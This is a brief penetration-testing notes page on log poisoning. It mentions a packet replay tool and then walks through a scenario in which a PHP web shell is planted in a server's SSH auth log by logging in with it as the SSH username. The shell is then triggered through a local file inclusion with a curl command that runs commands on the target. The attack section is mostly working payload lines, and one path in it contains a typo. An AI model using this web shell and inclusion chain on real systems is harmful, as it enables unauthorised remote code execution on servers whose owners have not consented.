Log Poisoning

Colasoft Packet Player

Is a packet replayer which allows users to open captured packet trace files and play them back in the network

Can replay fake traffic into a connected network.

http://www.colasoft.com/packet_player/

Scenario:

Ports 22 & 80

can view /var/log.auth.log on port 80

ssh "<?php echo system($_GET['cmd']);?>"@TARGETIPADDRESS

Call the webshell through the viewable log with in this case is viewable by LFI

Below view working directory, current user and lists contents of directory

curl 'http://TARGETIPADDRESS/index.php?file=%2fcar%2flog%2fauth.log&cmd=pwd;id;ls%20-lah'

results matching ""

    No results matching ""